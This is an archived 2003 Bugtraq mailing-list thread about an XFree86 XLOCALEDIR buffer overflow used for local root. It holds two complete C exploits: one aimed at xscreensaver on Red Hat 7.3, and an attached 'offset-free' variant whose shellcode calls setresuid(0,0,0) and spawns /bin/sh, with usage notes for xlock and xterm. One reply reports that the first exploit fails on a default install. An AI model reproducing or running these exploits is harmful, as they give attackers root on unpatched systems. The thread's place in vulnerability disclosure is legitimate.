92958 2003-03-06 21:41 /52 rader/ Angelo Rosiello <guilecool@usa.com> Importerad: 2003-03-06 21:41 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <3863> Ärende: xscreensaver exploit for Redhat 7.3 ------------------------------------------------------------ I think you don't need other comments: /* ** ** Tested on rh 7.3 using XFree86 ** xscreensaver vulnerability ** AUTHORS: Angelo Rosiello (Guilecool) & deka ** REQUIRES: X must be run! ** EFFECTS: local root exploit! ** ** deka is leet brother, thank you :> ** MAIL: guilecool@usa.com ** */ #include <stdio.h> #include <string.h> #include <unistd.h> #include <stdlib.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #define RETADDR 0xbfffdf20 //change it if u need char shellcode[] = "\x55\x89\xe5\x55\x89\xe5\x83\xec\x28\xc6\x45\xd8\x2f\xc6\x45\xdc" "\x2f\xc6\x45\xd9\x5f\xc6\x45\xda\x5a\xc6\x45\xdb\x5f\xc6\x45\xdd" "\x5f\xc6\x45\xde\x5f\x83\x45\xd9\x03\x83\x45\xda\x0f\x83\x45\xdb" "\x0f\x83\x45\xdd\x14\x83\x45\xde\x09\x31\xc0\x89\x45\xdf\x89\x45" "\xf4\x8d\x45\xd8\x89\x45\xf0\x83\xec\x04\x8d\x45\xf0\x31\xd2\x89" "\xd3\x89\xc1\x8b\x45\xf0\x89\xc3\x31\xc0\x83\xc0\x0b\xcd\x80\x31" "\xc0\x40\xcd\x80"; int main() { char buf[4076]; unsigned long retaddr = RETADDR; memset(buf, 0x0, 4076); memset(buf, 0x41, 4072); memcpy(buf+2076, &retaddr, 0x4); setenv("XLOCALEDIR", buf, 1); memset(buf, 0x90, 4072); memcpy((buf+4072-strlen(shellcode)), shellcode, strlen (shellcode)); setenv("HAXHAX", buf, 1); execl("/usr/X11R6/bin/xscreensaver", "xscreensaver", 0); } (92958) /Angelo Rosiello <guilecool@usa.com>/------- 93130 2003-03-07 18:36 /27 rader/ Steven Leikeim <steven@enel.ucalgary.ca> Importerad: 2003-03-07 18:36 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <3874> Kommentar till text 92958 av Angelo Rosiello <guilecool@usa.com> Ärende: Re: xscreensaver exploit for Redhat 7.3 ------------------------------------------------------------ On Thu, Mar 06, 2003 at 06:26:41PM -0000, Angelo Rosiello wrote: > > I think you don't need other comments: > > /* > ** > ** Tested on rh 7.3 using XFree86 > ** xscreensaver vulnerability > ** AUTHORS: Angelo Rosiello (Guilecool) & deka > ** REQUIRES: X must be run! > ** EFFECTS: local root exploit! > ** Oddly enough, this does NOT work on my RedHat 7.3 installation. I have the default xscreensaver RPM installed (xscreensaver-3.33-4). When I run this, xscreensaver DOES dump core, however, xscreensaver is not suid root and so will not itself give a root exploit. Perhaps there is an expected interaction with the X server (which is running as root) but this is not clear from Angelo's message. Steven Leikeim Department of Electrical and Computer Engineering University of Calgary (93130) /Steven Leikeim <steven@enel.ucalgary.ca>/(Ombruten) 93143 2003-03-07 22:42 /16 rader/ Inode <inode@mediaservice.net> Importerad: 2003-03-07 22:42 av Brevbäraren Extern mottagare: Angelo Rosiello <guilecool@usa.com> Mottagare: Bugtraq (import) <3884> Ärende: Re: xscreensaver exploit for Redhat 7.3 ------------------------------------------------------------ Hi all, exploit attached. Comments are welcome. Sincerely, +-------------------------------------------------------------------+ | Agazzini Maurizio Tel: +39-011-32.72.100 | | Security Analyst Fax: +39-011-32.46.497 | | @ Mediaservice.net S.R.L. D.S.D. Data Security Division | | | | PGP Key : http://www.wayreth.eu.org/Inode.asc | | Disclaimer: http://@Mediaservice.net/disclaimer | +-------------------------------------------------------------------+ (93143) /Inode <inode@mediaservice.net>/------------ Bilaga (text/plain) i text 93144 93144 2003-03-07 22:42 /73 rader/ Inode <inode@mediaservice.net> Bilagans filnamn: "xfree_4.2_exploit.c" Importerad: 2003-03-07 22:42 av Brevbäraren Extern mottagare: Angelo Rosiello <guilecool@usa.com> Mottagare: Bugtraq (import) <3885> Bilaga (text/plain) till text 93143 Ärende: Bilaga (xfree_4.2_exploit.c) till: Re: xscreensaver exploit for Redhat 7.3 ------------------------------------------------------------ /* Original exploit: ** oC-localX.c - XFree86 Version 4.2.x local root exploit ** By dcryptr && tarranta / oC This exploit is a modified version of the original oC-localX.c built to work without any offset. Some distro have the file: /usr/X11R6/bin/dga +s This program isn't exploitable because it drops privileges before running the Xlib function vulnerable to this overflow. This exploit works on linux x86 on all distro. Tested on: - Slackware 8.1 ( xlock, xscreensaver, xterm) - Redhat 7.3 ( manual +s to xlock ) - Suse 8.1 ( manual +s to xlock ) by Inode <inode@mediaservice.net> */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> static char shellcode[] = /* setresuid(0,0,0); */ "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80" /* /bin/sh execve(); */ "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e" "\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" /* exit(0); */ "\x31\xdb\x89\xd8\xb0\x01\xcd\x80"; #define ALIGN 0 int main(int argc, char **argv) { char buffer[6000]; int i; int ret; char *env[3] = {buffer,shellcode, NULL}; int *ap; strcpy(buffer, "XLOCALEDIR="); printf("\nXFree86 4.2.x Exploit modified by Inode <inode@mediaservice.net>\n\n"); if( argc != 3 ) { printf(" Usage: %s <full path> <name>\n",argv[0]); printf("\n Example: %s /usr/X11R6/bin/xlock xlock\n\n",argv[0]); return 1; } ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]) ; ap = (int *)( buffer + ALIGN + strlen(buffer) ); for (i = 0; i < sizeof(buffer); i += 4) *ap++ = ret; execle(argv[1], argv[2], NULL, env); return(0); } (93144) /Inode <inode@mediaservice.net>/------------